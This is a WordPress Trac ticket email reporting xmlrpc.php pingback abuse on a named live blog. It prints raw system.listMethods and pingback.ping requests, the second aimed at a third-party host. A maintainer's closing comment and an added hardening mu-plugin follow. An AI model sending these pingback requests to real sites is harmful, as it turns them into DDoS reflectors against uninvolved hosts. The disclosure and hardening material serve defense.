[wp-trac] [WordPress Trac] #47551: xmlrpc.php file is enabled. It can be used for brute-force attack and denial of service
WordPress Trac
noreply at wordpress.org
Mon Jun 17 15:27:31 UTC 2019
#47551: xmlrpc.php file is enabled. It can be used for brute-force attack and denial of service
----------------------------+------------------------
Reporter: pranayjain2511 | Owner: marybaum
Type: defect (bug) | Status: closed
Priority: normal | Milestone:
Component: XML-RPC | Version: 5.0.1
Severity: normal | Resolution: duplicate
Keywords: | Focuses:
----------------------------+------------------------
Changes (by SergeyBiryukov):
* status: accepted => closed
* priority: high => normal
* milestone: Awaiting Review =>
* keywords: needs-patch possible-vulnerability =>
* resolution: => duplicate
* severity: major => normal
New description:
https://blog.optimizely.com/ is a WordPress site.
WordPress sites that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can
be made part of a huge botnet causing a major DDoS. The website
https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
thus be potentially used for such an attack against other victim hosts.
In order to determine whether the xmlrpc.php file is enabled or not, using
the Repeater tab in Burp, send the request below.
{{{
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
_gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
login1-everyone; marketo_utm_medium=referral;
marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
optimizely.com-1560333355657-34661;
amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
_fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
_gid=GA1.2.871921774.1560541163;
sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 93

<methodCall>
<methodName>system.listMethods</methodName>
<params>
</params>
</methodCall>
}}}
Notice that a successful response is received, showing that the xmlrpc.php
file is enabled.
Now, considering the domain https://blog.optimizely.com, the xmlrpc.php
file discussed above could potentially be abused to cause a DDoS attack
against a victim host. This is achieved by simply sending a request that
looks like below.
As soon as the above request is sent, the victim host
(http://hackersera.com) gets an entry in its log file with a request
originating from the https://blog.optimizely.com domain verifying the
pingback.
Remediation:
If the xmlrpc.php file is not being used, it should be disabled and
removed completely to avoid any potential risks. Otherwise, it should at
the very least be blocked from external access.
Thanks
Note: screenshots are given below
HTTP request
{{{
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
_gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
login1-everyone; marketo_utm_medium=referral;
marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
optimizely.com-1560333355657-34661;
amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
_fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
_gid=GA1.2.871921774.1560541163;
sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 234

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://hackersera.com</string></value></param>
<param><value><string>https://blog.optimizely.com</string></value></param>
</params>
</methodCall>
}}}
Note: Please find attachments for PoC at the following URL:
https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn
--
Comment:
Hi @pranayjain2511, welcome to WordPress Trac!
A DoS (Denial of Service) against `xmlrpc.php` is no different to one
against the homepage or `wp-login.php`; preventing it is out of scope for
WordPress. Caching and security plugins often attempt to cover this well,
but ultimately it's an issue that needs to be handled at the server level.
See #35532, #36806, #24193, and other similar tickets.
Additionally, when writing this ticket you should have seen this notice:
> **Do not report potential security vulnerabilities here.**
> See the [https://make.wordpress.org/core/handbook/reporting-security-vulnerabilities/ Security FAQ] and visit the [https://hackerone.com/wordpress WordPress HackerOne program].
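As an added example, not code from the ticket or from WordPress core, the following must-use plugin applies the reporter's remediation inside WordPress rather than at the web server: it turns off the authenticated methods behind the brute-force vector and removes the pingback method behind the reflection vector, using only core filters (`xmlrpc_enabled`, `xmlrpc_methods`, `pings_open`, `wp_headers`). The comment's point stands that a raw request flood still has to be rate-limited at the server level; this reduces what each request that gets through can do.

```php
<?php
/**
 * Plugin Name: Restrict XML-RPC surface
 * Description: Added example (not WordPress core code). Place this file in
 * wp-content/mu-plugins/ so it loads on every request without activation.
 */

// 1. Brute-force surface: every method that takes a username/password goes
//    through wp_xmlrpc_server::login(), the only place `xmlrpc_enabled` is
//    consulted. Returning false makes each login attempt fail with fault 405,
//    but unauthenticated methods such as system.listMethods and pingback.ping
//    stay reachable, so this alone does not stop the reflection in the report.
add_filter( 'xmlrpc_enabled', '__return_false' );

// 2. Reflection surface: pingback.ping never logs in, so remove it from the
//    dispatch table instead. `xmlrpc_methods` is applied in the server
//    constructor before any call is routed; a missing method is answered with
//    fault -32601 and no longer appears in system.listMethods output.
add_filter( 'xmlrpc_methods', function ( array $methods ) {
    unset(
        $methods['pingback.ping'],
        $methods['pingback.extensions.getPingbacks']
    );
    return $methods;
} );

// 3. Close pings at the post level too: pingback_ping() checks pings_open() on
//    the target post before it fetches the source URL, so even a method that
//    another plugin re-adds cannot make this site request the victim host.
add_filter( 'pings_open', '__return_false' );

// 4. Stop advertising the endpoint: the X-Pingback response header and the
//    RSD <link> printed by wp_head are what scanners use to locate xmlrpc.php.
add_filter( 'wp_headers', function ( array $headers ) {
    unset( $headers['X-Pingback'] );
    return $headers;
} );
remove_action( 'wp_head', 'rsd_link' );
```

Verify the effect by replaying the report's pingback.ping request against a staging copy: the response should now be an XML-RPC fault rather than a fetch of the source URL, and the site's web server log should show no outbound request to that host.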
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47551#comment:4>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform